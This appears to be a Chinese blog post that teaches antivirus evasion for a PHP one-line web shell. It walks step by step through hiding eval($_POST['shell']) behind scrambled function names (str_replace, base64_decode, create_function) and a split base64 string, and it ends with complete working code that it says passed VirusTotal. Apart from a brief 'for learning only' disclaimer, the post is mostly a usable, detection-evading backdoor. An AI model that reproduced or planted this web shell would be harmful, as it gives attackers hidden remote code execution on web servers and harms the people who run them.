PHP一句话木马免杀（通过VirusTotal测试）

yumueat

已于 2022-01-28 21:13:43 修改

阅读量3.4k

点赞数

文章标签： php web安全安全

于 2022-01-28 21:02:56 首次发布

本文链接：https://blog.csdn.net/m0_52233414/article/details/122736319

版权

PHP一句话木马免杀

仅用于学习与交流，请勿用于非法用途！！！

简介与思路

免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”，它指的是一种能使病毒木马免于被杀毒软件查杀的技术。
其思路基本上都是修改病毒、木马的内容改变特征码，从而躲避了杀毒软件的查杀。说白了就是用各种各样的方法（比如拼接，编码，加密等）来隐藏关键代码。

流程

先写出基本语句

<?php
eval($_POST['shell']);
?>

准备几个函数来对基本语句进行伪装

<?php
eval($_POST['shell']);
$huan = str_replace("ac","","sactacrac_raceacpaclacaacce");
// 思路是先在str_replace中写好要构造的函数，
// 这里是打算把$huan这个变量当成str_replace函数来用
// 就先把第一三个参数填好，第一个随便填，第三个先填成要转换的目标
// 得$huan = str_replace("ac","","str_replace")
// 接着把第一个参数里面的东西随便插入进去
// 得$huan = str_replace("ac","","sactacrac_raceacpaclacaacce")
$jiemi = str_replace("bd","","bbdabdsbdebd64_dbdebdcbdobdde");
// 这里是打算把$jiemi这个变量当成base64_decode函数来用
$hanshu = str_replace("ef","","cefrefeefaeftefe_fefuefnefceftefiefoefn");
// 这里是打算把$hanshu这个变量当成create_function函数来用
?>

把基本语句进行base64加密

$a="ZXZhbCgkX1BPU1RbJ3NoZWxsJ10pOw==";
// 把基本语句进行base64加密

将加密后的语句拆分开

// 把基本语句进行base64加密,随便插入点字符
$s1="ZXZhbqwerCgkX1";
$s2="BPUqwer1RbJ3";
$s3="NoqwerZWxsJ";
$s4="10qwerpOw==";

组装

$ans = $hanshu('',$jiemi($huan("qwer","",$s1.$s2.$s3.$s4)));
// 利用之前准备好的函数和字符串把需要的语句拼出来,拼成一个匿名函数

调用

$ans();
// 调用这个函数

完整代码

<?php
$huan = str_replace("ac","","sactacrac_raceacpaclacaacce");//密码是shell
// 思路是先在str_replace中写好要构造的函数，
// 这里是打算把$huan这个变量当成str_replace函数来用
// 就先把第一三个参数填好，第一个随便填，第三个先填成要转换的目标
// 得$huan = str_replace("ac","","str_replace")
// 接着把第一个参数里面的东西随便插入进去
// 得$huan = str_replace("ac","","sactacrac_raceacpaclacaacce")
$jiemi = $huan("bd","","bbdabdsbdebd64_dbdebdcbdobdde");
// 这里是打算把$jiemi这个变量当成base64_decode函数来用
$hanshu = $huan("ef","","cefrefeefaeftefe_fefuefnefceftefiefoefn");
// 这里是打算把$hanshu这个变量当成create_function函数来用
$s1="ZXZhbqwerCgkX1";
$s2="BPUqwer1RbJ3";
$s3="NoqwerZWxsJ";
$s4="10qwerpOw==";
// 将加密后的语句拆分开
$ans = $hanshu('',$jiemi($huan("qwer","",$s1.$s2.$s3.$s4)));
// 利用之前准备好的函数和字符串把需要的语句拼出来,拼成一个匿名函数
$ans();
// 调用这个函数
?>